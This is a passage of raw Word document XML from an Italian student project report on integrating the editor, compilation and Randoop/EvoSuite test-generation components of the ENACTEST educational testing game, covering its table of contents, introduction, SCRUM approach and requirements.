              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DAFD523" w14:textId="1401322C" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195760" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1 Installazione</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195760 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D9090C8" w14:textId="36673BA6" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195761" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2 Prova di esecuzione</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195761 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09E1AB01" w14:textId="0E0F263F" w:rsidR="001D3178" w:rsidRPr="00715086" w:rsidRDefault="001D3178" w:rsidP="00EB152C">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00715086">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6486F6B6" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DEA7884" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E22C136" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091EDD54" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EA0170" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A52BE23" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E0FDC0" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6471EAEF" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC0139E" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD8575E" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79240B1C" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB0D407" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A85FF04" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3ECB2E" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFF2B7C" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0EA1E2" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5156A2F1" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189617F1" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A9A808" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EDD8BA" w14:textId="77777777" w:rsidR="00127893" w:rsidRPr="00715086" w:rsidRDefault="00127893" w:rsidP="00EB152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7896D1AD" w14:textId="59AFBA38" w:rsidR="00265F39" w:rsidRPr="00715086" w:rsidRDefault="001D3178" w:rsidP="00FD6F80">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc148195717"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00FF28B7" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD6F80" w:rsidRPr="00715086">
        <w:t>Introduzione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="288F235C" w14:textId="5BE903FF" w:rsidR="00FD6F80" w:rsidRPr="00715086" w:rsidRDefault="00FD6F80" w:rsidP="00FD6F80">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">La seguente documentazione è relativa all’attività di integrazione dei diversi task che costituiscono il gioco educativo “Man vs </w:t>
      </w:r>
      <w:r w:rsidR="000D52F2" w:rsidRPr="00715086">
        <w:t>Autolatre</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Testing Tools challenges” del progetto ENACTEST.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="1131"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1900"/>
        <w:gridCol w:w="1900"/>
      </w:tblGrid>
      <w:tr w:rsidR="0035366B" w:rsidRPr="00715086" w14:paraId="3B123FFF" w14:textId="77777777" w:rsidTr="0035366B">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EFEE0FE" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="030A3EA7" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>Gruppo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035366B" w:rsidRPr="00715086" w14:paraId="56FE3C37" w14:textId="77777777" w:rsidTr="0035366B">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="462DDD60" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>T6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68927E25" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>G8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035366B" w:rsidRPr="00715086" w14:paraId="10AB21E9" w14:textId="77777777" w:rsidTr="0035366B">
        <w:trPr>
          <w:trHeight w:val="275"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7258DD99" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>T7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="563A2BB2" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>G31</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035366B" w:rsidRPr="00715086" w14:paraId="35D5B563" w14:textId="77777777" w:rsidTr="0035366B">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10409DBF" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>T8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19F06169" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>G21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035366B" w:rsidRPr="00715086" w14:paraId="0F237A6F" w14:textId="77777777" w:rsidTr="0035366B">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="629C724D" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>T9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26D9DDEC" w14:textId="77777777" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="0035366B">
            <w:r w:rsidRPr="00715086">
              <w:t>G19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05A5A676" w14:textId="0DAD0EDD" w:rsidR="00FD6F80" w:rsidRPr="00715086" w:rsidRDefault="00FD6F80" w:rsidP="00FD6F80">
      <w:r w:rsidRPr="00715086">
        <w:t>Il task assegnatoci in particolare prevede l’integrazione dei task 6,7,8,9 che si occupano rispettivamente di fornire un editor di testo, funzionalità di compilazione ed esecuzione, generazione di test automatici da parte dei robot Randoop ed EvoSuite.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA9FDB2" w14:textId="315A782D" w:rsidR="0035366B" w:rsidRPr="00715086" w:rsidRDefault="0035366B" w:rsidP="00FD6F80">
      <w:r w:rsidRPr="00715086">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>Per ognuno dei task abbiamo scelto lo specifico gruppo dopo aver consultato le documentazioni. Ad esempio per quanto riguarda T6 e T7 i gruppi G8 e G31 si erano precedentemente accordati per fornire interfacce compatibili, che hanno reso l’integrazione più semplice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAA58BA" w14:textId="1CCB6552" w:rsidR="00A02CD7" w:rsidRPr="00715086" w:rsidRDefault="00A02CD7" w:rsidP="00A02CD7">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc148195718"/>
      <w:r w:rsidRPr="00715086">
        <w:t>1.1 Approccio adottato</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4ECE01F0" w14:textId="504872D5" w:rsidR="001D3178" w:rsidRPr="00715086" w:rsidRDefault="001D3178" w:rsidP="001D3178">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Per lo sviluppo è stato scelto una metodologia di lavoro </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>agile</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> basata su SCRUM, un framework per lo sviluppo iterativo del software. Tale framework si basa sugli sprint, ovvero periodi di tempo nei quali il team si concentra sul raggiungimento di un insieme di obiettivi prefissati</w:t>
      </w:r>
      <w:r w:rsidR="00BE6B25" w:rsidRPr="00715086">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A4D1DE" w14:textId="668DD1C8" w:rsidR="00BE6B25" w:rsidRPr="00715086" w:rsidRDefault="00856018" w:rsidP="001D3178">
      <w:r w:rsidRPr="00715086">
        <w:t>Per la gestione condivisa del progetto e per il versioning si è deciso di usare GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474DA053" w14:textId="7D3D2243" w:rsidR="00A02CD7" w:rsidRPr="00715086" w:rsidRDefault="00A02CD7" w:rsidP="00A02CD7">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc148195719"/>
      <w:r w:rsidRPr="00715086">
        <w:t>1.2 Iteration Planning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="19B3574F" w14:textId="01B552AF" w:rsidR="00273EE5" w:rsidRPr="00715086" w:rsidRDefault="0023566A" w:rsidP="00163A33">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2431B451" wp14:editId="1DB9E0AF">
            <wp:extent cx="5988018" cy="4518660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1270828834" name="Immagine 1" descr="Immagine che contiene testo, schermata, Rettangolo,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28834" name="Immagine 1" descr="Immagine che contiene testo, schermata, Rettangolo, quadra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989247" cy="4519588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5837C7" w14:textId="12DE10AB" w:rsidR="00B1049F" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="00273EE5">
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C322C96" wp14:editId="79120FFE">
            <wp:extent cx="6035040" cy="6671857"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1690088968" name="Immagine 1" descr="Immagine che contiene testo, schermata, Rettangolo,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88968" name="Immagine 1" descr="Immagine che contiene testo, schermata, Rettangolo, quadrat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037190" cy="6674234"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B1049F" w:rsidRPr="00715086">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="260FE558" w14:textId="5DB3A67F" w:rsidR="00A02CD7" w:rsidRPr="00715086" w:rsidRDefault="00A02CD7" w:rsidP="00A02CD7">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc148195720"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>2 Specifica dei Requisiti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7C357F87" w14:textId="4807AF7E" w:rsidR="00783ADC" w:rsidRPr="00715086" w:rsidRDefault="002223F1" w:rsidP="002223F1">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc148195721"/>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00783ADC" w:rsidRPr="00715086">
        <w:t>Storie Utente</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="239E98CC" w14:textId="0B5F41DF" w:rsidR="00C6132D" w:rsidRPr="00715086" w:rsidRDefault="00B2582A" w:rsidP="00C6132D">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="123D223C" wp14:editId="0C93408F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>297815</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>447040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5021580" cy="1367790"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="797166742" name="Immagine 9" descr="Immagine che contiene testo, schermata, gia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66742" name="Immagine 9" descr="Immagine che contiene testo, schermata, giallo, Rettangol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1580" cy="1367790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00C6132D" w:rsidRPr="00715086">
        <w:t>Le storie utente permettono di descrivere i requisiti del sistema dal punto di vista dell’utente che lo utilizzerà.</w:t>
      </w:r>
      <w:r w:rsidR="00891E93" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF358E" w14:textId="5BC4C8A2" w:rsidR="00CA20D3" w:rsidRPr="00715086" w:rsidRDefault="00CA20D3" w:rsidP="00CA20D3">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc148195722"/>
      <w:r w:rsidRPr="00715086">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00783ADC" w:rsidRPr="00715086">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00FF28B7" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>Requisiti funzionali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5BD12887" w14:textId="0E23B83A" w:rsidR="00CA20D3" w:rsidRPr="00715086" w:rsidRDefault="00CA20D3" w:rsidP="00C40012">
      <w:r w:rsidRPr="00715086">
        <w:t>Trattandosi di un task di integrazione, una descrizione precisa dei requisiti funzionali si può trovare all’interno delle documentazioni dei rispettivi task. Sono stati però individuati ulteriori requisiti funzionali da soddisfare:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F6218C" w14:textId="77777777" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00CA20D3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Il servizio deve garantire il corretto salvataggio dei test dei Robot nel repository condiviso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE02894" w14:textId="26F6FBBA" w:rsidR="00084B1B" w:rsidRPr="00715086" w:rsidRDefault="00084B1B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Il servizio deve garantire il recupero dei dati di coverage dei Robot dal repository condiviso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687EF3D9" w14:textId="00DAC191" w:rsidR="00C40012" w:rsidRPr="00715086" w:rsidRDefault="00C40012">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Il servizio deve garantire il confronto dei risultati di coverage ottenuti dall’utente e dai robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6830ED57" w14:textId="1C571B56" w:rsidR="00494EBD" w:rsidRPr="00715086" w:rsidRDefault="00494EBD">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Il servizio deve poter permettere all’utente di valutare la coverage della propria classe di test con Ja</w:t>
      </w:r>
      <w:r w:rsidR="00891E93" w:rsidRPr="00715086">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00891E93" w:rsidRPr="00715086">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>o o con EvoSuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E105F57" w14:textId="62CFE929" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00B407E8" w:rsidP="00B407E8">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc148195723"/>
      <w:r w:rsidRPr="00715086">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00783ADC" w:rsidRPr="00715086">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00FF28B7" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>Requisiti non funzionali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="6336E430" w14:textId="0C819E48" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00B407E8" w:rsidP="00B407E8">
      <w:r w:rsidRPr="00715086">
        <w:t>I requisiti non funzionali descrivono le proprietà del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77800015" w14:textId="02F0305E" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00B407E8">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
